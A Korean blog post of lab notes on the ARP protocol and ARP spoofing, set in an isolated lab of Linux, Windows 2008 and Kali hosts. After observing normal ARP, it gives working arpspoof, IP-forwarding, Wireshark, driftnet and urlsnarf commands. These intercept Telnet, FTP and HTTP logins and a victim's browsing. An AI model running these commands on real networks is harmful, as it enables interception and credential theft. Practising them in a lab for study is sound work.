본문 바로가기

Learning/└◆Network Hacking

네트워크 해킹 - 02. ARP 프로토콜 & ARP Spoofing 공격

 

ARP 프로토콜 & ARP Spoofing 공격

 

Ex1) ARP 동작 확인 및 캡처

 

<Linux200>

ARP 테이블 초기화 및 확인

# arp -d 192.168.20.201

# arp -a

 

와이어샤크 실행 및 캡처 실시 (Caputre -> Interfaces -> 랜-카드 Start 클릭)

# wireshark &

 

window2008(192.168.20.201)로 Ping test

# ping -c 1 192.168.20.201

PING 192.168.41.201 (192.168.41.201) 56(84) bytes of data.
64 bytes from 192.168.41.201: icmp_seq=1 ttl=128 time=0.479 ms

 

--- 192.168.41.201 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.479/0.479/0.479/0.000 ms 

 

ARP 테이블 확인 및 캡처 내용 확인

# arp -a

win2008(192.168.20.201) at 00:0C:29:3E:92:78 [ether] on eth0

 

Linux200 ARP 패킷 캡처 내용

 

Linux -> win2008 request 신호 보냄

win2008의 mac adress를 질의하고 신호를 받는다.

win2008 -> Linux reply 신호 보냄

linux 의 mac adress를 질의하고 신호를 받는다.

 

<Window2008>

ARP 테이블 초기화 및 확인

C:\users\administarator>arp -d      arp 전체삭제, window 명령 프롬프트에서 지원.

C:\users\administarator>arp -a

ARP 항목을 찾을 수 없습니다.

 

와이어샤크 실행 및 캡처

 

Linux200(192.168.20.200)로 Ping Test

C:\users\administarator>ping -n 1 192.168.20.200

 

C:\users\administarator>arp -a

인터페이스 : 192.168.20.201 ---0xb

인터넷 주소        물리적 주소            유형

192.168.20.200    00-0c-29-72-28-7c    동적

 

 

 

Ex2) ARP Spoofing Attack 1

============================================

-------+------------+-----------+-------------

              |                        |                      |

        linux200            Kali          win2008

         (Victim)        (Attacker)      (Victim)

============================================

 

<Linux200,Window2008> 

arp 정보 삭제 초기화

# arp -d 192.168.20.201

C:\users\administarator>arp -d

 

 

<Kali Linux>

nmap을 이용하여 같은 서브넷 환경의 시스템 및 서비스 목록을 확인

# nmap -F 192.168.20.0/24

 

IPv4 Forwarding 임시적 기능 ON

# echo 1 > /proc/sys/net/ipv4/ip_forward

# cat /proc/sys/net/ipv4/ip_forward

1

 

IPv4 Forwarding 영구적 ON 설정 방법.

 

 

 

와이어샤크 실행 및 캡처 실행

# wireshark &

 

 

ARP 스푸핑 실시 (조된 ARP reply 신호를 지속적으로 보내기)

[TERM1]

# arpspoof -i eth1 -t 192.168.20.200 192.168.20.201

[TERM2]

# arpspoof -i eth1 -t 192.168.20.201 192.168.20.200

 

와이어샤크 캡처 내용 참고 확인

Linux서버에 win2008의 MAC주소를 Kali Linux의 MAC주소로 전송

win2008서버에 Linux의 MAC주소를 Kali Linux의 MAC주소로 전송

 

<Window2008>

Window2008에서 Linux200(192.168.20.200)으로 Telnet,FTP 서비스 접속 테스트

C:\users\administrator>telnet 192.168.20.200

login :root

password: ****

[~]#

[~]# exit

 

C:\users\administrator>ftp 192.168.20.200

                  

<Linux200,Window2008> 

arp 정보 확인 Kali Linux MAC 확인

# arp -a

 

 

C:\users\administarator>arp -a

 

<Kali Linux>

Wind2008에서 Linux200으로 접근하는 Telnet,FTP 캡처 내용 확인

 

와이어샤크 캡처 중지 및 ARP 스푸핑 해지

[TERM1] Ctrl + C

[TERM2] Ctrl + C

 

 

Ex3) ARP Spoofing Attack 2

============================================

 

                -------+------------+-----------+-------------

                              |                       |                      |

                         Firewall            Kali          win2008

                        (Victim)        (Attacker)      (Victim)

============================================

 

Firewall, Window2008 ARP 정보 삭제

(Firewall)# arp -d <IP>

(win2008)C:\>arp -d

 

<Kali Linux>

와이어샤크 캡처 실행

# wireshark &

 

ARP 스푸핑

[TERM1] arpspoof -i eth1 -t 192.168.20.100 192.168.20.201

[TERM2] arpspoof -i eth1 -t 192.168.20.201 192.168.20.100

 

<Window2008>

KT DNS로 Ping 테스트

C:\users\administrator>ping 168.126.63.1

 

ARP 테이블 확인

C:\users\administrator>arp -a

192.168.20.100 의 MAC주소가 Kali linux의 MAC주소로 되어있는것을 확인할 수 있다.

 

와이어샤크 캡처 내용

 

 

 

Ex4) ARP Spoofing을 이용한 ID/PWD 해킹

 

 

<Window2008>

보안이 취약한 웹-사이트 접속

http://certcollection.org/index.html 접속 이후 abcd/abcd1234로 로그인

 

<Kali Linux>

와이어샤크 캡처 확인

Filter : http -> Ctrl + F -> String,Packet Bystes 체크 -> abcd -> 찾기

 

 

Fire -> Export Objects -> HTTP 클릭 -> Sava All

 

바탕화면 -> 이름 'HTTP Capture' -> 확인

 

이미지 저장 확인

 

 

Ex5) ARP Spoofing을 이용한 이미지 및 URL 실시간 해킹

 

 

<Kali Linux>

[TERM1] driftnet -i eth0

[TERM2] urlsnarf -i eth0

 

<Window2008>

Window2008에서 크롬을 실행하여 구글에서 이미지 검색

ex) nba 이미지 검색 -> 클릭 몇번 실시

 

<Kali Linux>

driftnet 창 크기를 좀 크게하여, window2008에서 구글 검색 이미지를 확인한다.